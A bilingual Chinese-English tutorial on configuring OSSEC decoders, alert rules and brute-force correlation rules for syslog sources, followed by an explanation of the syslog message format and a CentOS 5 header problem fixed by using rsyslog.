<localfile>
  <log_format>syslog</log_format>
  <location>/path/to/log/file</location>
</localfile>

如果日志源是远程syslog,可通过添加如下配置实现。

<remote>
<connection>syslog</connection>
<protocol>udp</protocol>
<port>2514</port>
<allowed-ips>172.16.24.0/24</allowed-ips>
</remote>

2.2 创建自定义的日志泛化规则

假如有两条日志如下文:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .

该日志使用ossec-logtest分析之后结果如下:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .



**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.16.25.130/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
No decoder matched.

由此可知OSSEC在分析日志的时候,经过了两个泛化过程:pre-decoding和 decoding。

pre-decoding过程是ossec内置的,只要是标准的syslog日志,都可以解析出如下4个基本信息。

Timestamp:Jun 11 22:06:30

Hostname: 172.17.153.38/172.16.24.32

Programe_name: /usr/bin/auditServerd

Log: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333.

在decoding过程,用户可以通过修改/var/ossec/etc/decoder.xml,实现自定义的泛化。例如在该文件中添加如下规则:

<decoder name="auditServerd">
  <program_name>/usr/bin/auditServerd</program_name>
</decoder>

再次执行/var/ossec/bin/ossec-logtest

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'

可以发现,该条日志成功命中了名为auditServerd的泛化规则,该规则可以准确地将日志识别为程序auditServerd所发出的。

除此之外,基于auditServerd这条规则,我们还可以添加更多的子规则,来识别出更多的信息。如:

<decoder name="auditServerd">                               
  <program_name>/usr/bin/auditServerd</program_name>                        
</decoder>                                                                                                                                                                                                                                       
<decoder name="auditServerd-login">                                      
  <parent>auditServerd</parent>                           
  <regex offset="after_parent">^User (\S+) login (\S+) from (\S+) to (\S+) distport (\S+) \.$</regex>  
  <order>user,status,srcip,dstip,dstport</order>                                
</decoder>

再次执行/var/ossec/bin/ossec-logtest,可获取更多的信息,如下:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status:'SUCEESS'
srcip: '172.17.153.36'
dstip: '172.17.153.38'
dstport: '3333'

用户通过配置上述正则表达式,获取特定字段,用于后续的关联分析。OSSEC一共内置了14个用户可解析的字段:

   - location - where the log came from (only on FTS)

   - srcuser  - extracts the source username

   - dstuser  - extracts the destination (target) username

   - user     - an alias to dstuser (only one of the two can be used)

   - srcip    - source ip

   - dstip    - dst ip

   - srcport  - source port

   - dstport  - destination port

   - protocol - protocol

   - id       - event id 

   - url      - url of the event

   - action   - event action (deny, drop, accept, etc)

   - status   - event status (success, failure, etc)

   - extra_data     - Any extra data

3. 自定义日志告警规则

3.1 规则文件路径配置

OSSEC的规则配置文件默认路径为/var/ossec/rules/,要加载规则文件,需要在/var/ossec/etc/ossec.conf 中配置,默认的配置如下:

 <ossec_config>  <!-- rules global entry -->
  <rules>
    <include>rules_config.xml</include>
    <include>pam_rules.xml</include>
    <include>sshd_rules.xml</include>
    <include>telnetd_rules.xml</include>
    <include>syslog_rules.xml</include>
    <include>arpwatch_rules.xml</include>                                                                                                                                                                                                     
     ......                                                                                                                                                                                     
    <include>clam_av_rules.xml</include>                                                                                                                                                                                                      
    <include>bro-ids_rules.xml</include>                                                                                                                                                                                                      
    <include>dropbear_rules.xml</include>                                                                                                                                                                                                     
    <include>local_rules.xml</include>                                                                                                                                                                                                        
</rules>                                                                                                                                                                                                                                      
</ossec_config>  <!-- rules global entry -->

其实通过下列配置,可以实现加载/var/ossec/rules 下的所有规则文件:

<ossec_config>
    <rules>
        <rule_dir pattern=".xml$">rules</rule_dir>
    </rules>
</ossec_config>

对于泛化规则,也可以通过配置decoder_dir域来实现,如:

<ossec_config>
    <rules>
        <decoder_dir pattern=".xml$">rules/plugins/decoders</decoder_dir>
    </rules>
</ossec_config>

上述配置可将/var/ossec/rules/plugins/decoders目录下所有的xml文件都添加为OSSEC日志泛化规则。

For more detailed configuration options and syntax, refer to:

http://ossec-docs.readthedocs.org/en/latest/syntax/head_ossec_config.rules.html#element-rule_dir

 

3.2 OSSEC alert rule configuration

For example, to add alert rules for the program auditServerd we create a new rule file dedicated to it. For programs whose rule files already ship with OSSEC, such as sshd, openbsd or vsftpd, we simply add to or modify the existing file.

First, create the file

/var/ossec/rules/auditServerd_rules.xml

and add the following content:

<group name="auditServer,">
   <rule id="80000" level="0" noalert="1">
    <decoded_as>auditServerd</decoded_as>
    <description>Grouping for the auditServerd rules.</description>
  </rule>

  <rule id="80001" level="10">
    <if_sid>80000</if_sid>
    <user>blackrat</user>
    <srcip>172.17.153.36</srcip>
    <description>User blackrat is not allowed login from 172.17.153.36!</description>
  </rule>
</group>

In the rules above, rule id 80000 groups the logs for counting: whenever a log is decoded as auditServerd, it is assigned to the auditServer group and the corresponding counter in the state machine is incremented.

Rule 80001 states that if the user is blackrat and the srcip is 172.17.153.36, the rule matches and the alert "User blackrat is not allowed login from 172.17.153.36!" is raised.

Then add the new rule file to /var/ossec/etc/ossec.conf:

  …
  <include>dropbear_rules.xml</include>
  <include>local_rules.xml</include>
  <include>auditServerd_rules.xml</include>
 </rules>
</ossec_config>
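
ossec-logtest reads the rule files directly every time it runs, but the analysis daemon (ossec-analysisd) only picks up a newly added rule file after a restart. Assuming the default install path, a typical way to apply the change on the server is:

/var/ossec/bin/ossec-control restart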

Run /var/ossec/bin/ossec-logtest; the result is as follows:

**Phase 1: Completed pre-decoding.
       full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
       hostname: '172.17.153.38/172.16.24.32'
       program_name: '/usr/bin/auditServerd'
       log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
       decoder: 'auditServerd'
       dstuser: 'blackrat'
       status: 'SUCEESS'
       srcip: '172.17.153.36'
       dstip: '172.17.153.38'
       dstport: '3333'

**Phase 3: Completed filtering (rules).
       Rule id: '80001'
       Level: '10'
       Description: 'User blackrat is not allowed login from 172.17.153.36!'
**Alert to be generated.

3.3 Correlation alert rules

OSSEC can raise alerts based on correlation across events, both causal (one rule conditioned on another) and frequency-based. This is configured as follows.

Suppose we want an alert when logins to auditServerd from the same source IP fail five times within one minute. We can configure the rules as follows:

<group name="auditServer,">
   <rule id="80000" level="0" noalert="1">
    <decoded_as>auditServerd</decoded_as>
    <description>Grouping for the auditServerd rules.</description>
  </rule>

  <rule id="80001" level="10">
    <if_sid>80000</if_sid>
    <match>SUCEESS</match>
    <user>blackrat</user>
    <srcip>172.17.153.36</srcip>
    <description>User blackrat is not allowed login from 172.17.153.36!</description>
  </rule>

  <rule id="80002" level="1">
    <if_sid>80000</if_sid>
    <match>PWD_ERROR</match>
    <group>authServer_login_failures,</group>
    <description>login auditServerd password error.</description>
  </rule>

  <rule id="80003" level="15" frequency="5" timeframe="60" ignore="30"> 
    <if_matched_group>authServer_login_failures</if_matched_group>
    <description>auditServerd brute force trying to get access to </description>       
    <description>the audit system.</description>
    <same_source_ip />
    <group>authentication_failures,</group>
  </rule>
</group>

Run /var/ossec/bin/ossec-logtest and feed it the following log line five times in a row:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .
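
Rather than pasting the line five times by hand, the same test can be driven by piping it repeatedly into ossec-logtest, which reads events from standard input. A rough sketch, assuming the default install path:

for i in 1 2 3 4 5; do
  echo "Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 ."
done | /var/ossec/bin/ossec-logtest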

The result is as follows:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .'
**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status: 'PWD_ERROR'
srcip: '172.17.153.36'
dstip: '172.17.153.38'
dstport: '3333'

**Phase 3: Completed filtering (rules).
Rule id: '80003'
Level: '15'
Description: 'auditServerd brute force trying to get access to the audit system.'
**Alert to be generated.

For more detailed syntax of OSSEC alert rules, see:
http://ossec-docs.readthedocs.org/en/latest/syntax/head_rules.html

For the syntax of OSSEC regular expressions, see:
http://ossec-docs.readthedocs.org/en/latest/syntax/regex.html

Source:
http://www.freebuf.com/articles/network/36484.html

A captured syslog packet looks like this:

[screenshot of the captured syslog packet omitted]

On Unix-like operating systems, syslog is widely used for system logging. Syslog messages can be written to local files or sent over the network to a syslog server, which can centrally store the messages from many devices or parse their content for further processing. Typical applications include network management tools, security management systems and log audit systems.

A complete syslog message contains the facility (the program module that produced the log), the severity (level), the timestamp, the hostname or IP, the process name, the process ID and the message body. On Unix-like systems, the combination of facility and severity decides whether a message is recorded, where it is written, and whether it is forwarded to a syslog server. Because syslog is simple and flexible, it is no longer limited to logging on Unix-like hosts; almost any scenario that needs to record and ship logs may use syslog.

For example:
<86>Aug 26 15:00:14 localhost sshd[32390]: Failed password for admin from 192.168.190.201 port 61410 ssh2
This is an authpriv log. It consists of three parts: PRI, HEADER and MSG. Most syslog messages contain the PRI and MSG parts, while the HEADER may be absent.
1) PRI
The PRI part is a single number enclosed in angle brackets. It encodes both the facility (the program module) and the severity: the number equals facility * 8 + severity.
Equivalently, in binary the lowest 3 bits are the severity, and the remaining high bits shifted right by 3 give the facility.
Decimal 181 = binary 10110101
Binary 10110 = decimal 22, which is local6
Binary 101 = decimal 5, which is Notice
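
Applying the same arithmetic to the <86> example above gives facility 10 (authpriv, i.e. security/authorization) and severity 6 (informational). A quick check with plain shell arithmetic, nothing OSSEC-specific:

PRI=86
echo "facility=$((PRI / 8)) severity=$((PRI % 8))"   # facility=10 (authpriv), severity=6 (informational)

PRI=181
echo "facility=$((PRI / 8)) severity=$((PRI % 8))"   # facility=22 (local6), severity=5 (notice)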

The facilities are defined as follows. As can be seen, the syslog facilities were defined for early Unix systems, but user-level (1) and local0 through local7 (16-23) are reserved for other programs to use:

      Numerical             Facility
         Code

          0             kernel messages
          1             user-level messages
          2             mail system
          3             system daemons
          4             security/authorization messages (note 1)
          5             messages generated internally by syslogd
          6             line printer subsystem
          7             network news subsystem
          8             UUCP subsystem
          9             clock daemon (note 2)
         10             security/authorization messages (note 1)
         11             FTP daemon
         12             NTP subsystem
         13             log audit (note 1)
         14             log alert (note 1)
         15             clock daemon (note 2)
         16             local use 0  (local0)
         17             local use 1  (local1)
         18             local use 2  (local2)
         19             local use 3  (local3)
         20             local use 4  (local4)
         21             local use 5  (local5)
         22             local use 6  (local6)
         23             local use 7  (local7)

The severities are defined as follows:

       Numerical         Severity
        Code

         0       Emergency: system is unusable
         1       Alert: action must be taken immediately
         2       Critical: critical conditions
         3       Error: error conditions
         4       Warning: warning conditions
         5       Notice: normal but significant condition
         6       Informational: informational messages
         7       Debug: debug-level messages

2) HEADER
The HEADER part contains two fields: the timestamp and the hostname (or IP).
The timestamp immediately follows the PRI with no space in between; its format must be "Mmm dd hh:mm:ss" and does not include the year.

3) MSG
The MSG part is further divided into TAG and Content, where the TAG is optional.
In the example, sshd[32390] is the TAG; it contains the process name and the process PID.
The TAG is separated from the Content by a colon; the Content itself is defined by the application.
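
Putting the three parts together for the example line above (annotation only, based on the fields already described):

<86>                                  -> PRI     (authpriv=10, informational=6; 10*8+6=86)
Aug 26 15:00:14 localhost             -> HEADER  (timestamp + hostname)
sshd[32390]:                          -> MSG/TAG (process name and PID)
Failed password for admin from 192.168.190.201 port 61410 ssh2   -> MSG/Content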

 

First, capturing packets on the server confirms that the syslog traffic arrives.
Next, look at the syslog received from a CentOS 5 host:

[screenshot of the syslog packet sent by CentOS 5 omitted]

We find that the syslog sent by CentOS 5 is missing the HEADER part: there is no timestamp and no hostname or IP.
A complete syslog message, for example from CentOS 6, looks like this:

[screenshot of the syslog packet sent by CentOS 6 omitted]

We run /opt/ossec/bin/ossec-logtest -v; the -v flag makes the output more verbose.
The test result for the CentOS 6 log is as follows:

Aug 26 15:00:14 localhost sshd[32390]: Failed password for admin from 192.168.190.201 port 61410 ssh2


**Phase 1: Completed pre-decoding.
       full event: 'Aug 26 15:00:14 localhost sshd[32390]: Failed password for admin from 192.168.190.201 port 61410 ssh2'
       hostname: 'localhost'
       program_name: 'sshd'
       log: 'Failed password for admin from 192.168.190.201 port 61410 ssh2'

**Phase 2: Completed decoding.
       decoder: 'sshd'
       dstuser: 'admin'
       srcip: '192.168.190.201'

**Phase 3: Completed filtering (rules).
       Rule id: '5716'
       Level: '5'
       Description: 'SSHD authentication failed.'
**Alert to be generated.

As shown, the first phase is pre-decoding, which extracts the timestamp, the hostname (localhost) and the program name (sshd).
The second phase is decoding, which matches the log content from the first phase and parses it according to decoder.xml.
The third phase is rule matching; here rule 5716 is hit.

The test result for the CentOS 5 log is as follows:

sshd[20237]: Failed password for admin from 10.59.0.85 port 41497 ssh2


**Phase 1: Completed pre-decoding.
       full event: 'sshd[20237]: Failed password for admin from 10.59.0.85 port 41497 ssh2'
       hostname: 'localhost'
       program_name: '(null)'
       log: 'sshd[20237]: Failed password for admin from 10.59.0.85 port 41497 ssh2'

**Phase 2: Completed decoding.
       No decoder matched.

**Phase 3: Completed filtering (rules).
       Rule id: '1002'
       Level: '2'
       Description: 'Unknown problem somewhere in the system.'
**Alert to be generated.

As shown, the CentOS 5 log did not match any decoder.
Instead it matched rule 1002; let's look at that rule:
<rule id="1002" level="2">
  <match>$BAD_WORDS</match>
  <options>alert_by_email</options>
  <description>Unknown problem somewhere in the system.</description>
</rule>

<var name="BAD_WORDS">core_dumped|failure|error|attack|bad |illegal |denied|refused|unauthorized|fatal|failed|Segmentation Fault|Corrupted</var>
As we can see, it matched because of the keyword "failed".
So the alert we actually wanted was not produced because no decoder matched, and the root cause is that the CentOS 5 syslog format carries no HEADER information.
Solution:
Install rsyslog on CentOS 5 and disable the legacy syslog service.
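
As a rough sketch of that fix on CentOS 5 (the forwarding target 192.168.192.195 and the choice of UDP port 514 are assumptions for illustration; adjust them to wherever your OSSEC server actually listens for syslog):

# install rsyslog and forward all messages to the OSSEC server (assumed address/port)
yum install -y rsyslog
echo '*.* @192.168.192.195:514' >> /etc/rsyslog.conf

# swap the services: stop the legacy syslog daemon and start rsyslog
service syslog stop && chkconfig syslog off
service rsyslog start && chkconfig rsyslog on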